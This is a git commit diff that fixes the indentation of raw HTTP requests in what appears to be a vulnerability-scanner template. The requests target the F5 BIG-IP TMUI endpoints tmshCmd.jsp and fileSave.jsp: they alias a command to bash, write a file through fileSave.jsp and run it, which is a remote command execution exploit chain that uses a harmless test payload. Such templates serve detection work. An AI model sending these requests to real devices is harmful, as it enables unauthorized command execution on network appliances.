📝 Fix indentation on RAW requests
parent
f4da7bec43
commit
2479e51afb
|
@ -24,34 +24,34 @@ requests:
|
||||||
condition: or
|
condition: or
|
||||||
part: body
|
part: body
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
|
POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Connection: close
|
Connection: close
|
||||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
|
||||||
|
|
||||||
command={{url_encode("create cli alias private list command bash")}}
|
command={{url_encode("create cli alias private list command bash")}}
|
||||||
- |
|
- |
|
||||||
POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1
|
POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Connection: close
|
Connection: close
|
||||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
|
||||||
|
|
||||||
fileName={{url_encode("/tmp/nonexistent")}}&content={{url_encode("echo 'aDNsbDBfdzBSbGQK' | base64 -d")}}
|
fileName={{url_encode("/tmp/nonexistent")}}&content={{url_encode("echo 'aDNsbDBfdzBSbGQK' | base64 -d")}}
|
||||||
- |
|
- |
|
||||||
POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
|
POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Connection: close
|
Connection: close
|
||||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
|
||||||
|
|
||||||
command={{url_encode("list /tmp/nonexistent")}}
|
command={{url_encode("list /tmp/nonexistent")}}
|
||||||
- |
|
- |
|
||||||
POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
|
POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Connection: close
|
Connection: close
|
||||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
|
||||||
|
|
||||||
command={{url_encode("delete cli alias private list")}}
|
command={{url_encode("delete cli alias private list")}}
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: status
|
- type: status
|
||||||
|
|
Loading…
Reference in New Issue